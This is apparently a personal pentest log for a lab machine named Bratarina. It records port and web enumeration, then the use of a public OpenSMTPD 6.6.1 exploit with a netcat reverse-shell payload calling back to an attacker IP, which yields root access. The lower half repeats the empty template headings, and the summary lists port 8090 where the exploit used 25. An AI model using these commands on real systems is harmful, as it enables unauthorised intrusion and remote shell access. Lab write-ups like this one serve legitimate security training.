Bratarina

🧪 Pentest Log: {{date:2025-08-09}}

🔍 Target Information

Machine Name: Bratarina
IP Address: 192.168.223.71
Operating System: Linux

ip=192.168.223.71

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 25

searchsploit OpenSMTPD

found

OpenSMTPD 6.6.1 - Remote Code Execution

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 8090
Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

https://www.exploit-db.com/exploits/47984

python3 47984.py $ip 25 'busybox nc 192.168.45.163 25 -e /bin/bash'

nc -lvnp 25

🧬 Privilege Escalation

👤 Current Access

User: root
Groups: root
Shell Type: reverse shell

🔍 Enumeration

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: N/A
Target Binary/Service: N/A
Reference / Source: N/A

🧪 Pentest Log: {{date:2025-08-09}}

🔍 Target Information

📡 Enumeration

🔌 Port Scanning

Command Used

Port 22

Port 25

Port 80

Web Content Enumeration

Port 445

💣 Exploitation

📌 Vulnerability Summary

🚀 Exploit Execution

🔧 Exploit Method

🧬 Privilege Escalation

👤 Current Access

🔍 Enumeration

🔓 Privilege Escalation Exploit

📌 Exploit Summary

🔧 Exploit Steps